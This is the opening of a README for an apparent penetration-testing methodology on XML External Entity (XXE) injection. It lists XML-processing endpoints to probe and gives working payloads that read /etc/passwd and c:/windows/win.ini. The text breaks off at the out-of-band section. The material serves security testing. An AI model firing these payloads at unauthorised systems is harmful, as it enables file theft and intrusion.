Documentation
README
XML External Entity (XXE) Injection
Objective
Exploit XML parsing vulnerabilities to read local files, perform SSRF, or exfiltrate data via out-of-band channels.
Testing Methodology
Phase 1: Identify XML Processing
Look for endpoints accepting:
Content-Type: application/xmlortext/xml- SOAP endpoints (
.asmx,.wsdl) - File upload accepting SVG, DOCX, XLSX
- RSS/Atom feed processing
- SAML authentication
Phase 2: In-Band XXE (File Read)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
Windows targets:
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
Phase 3: Blind XXE (Out-of-Band)
This is the opening of the README. Read the full README on GitHub.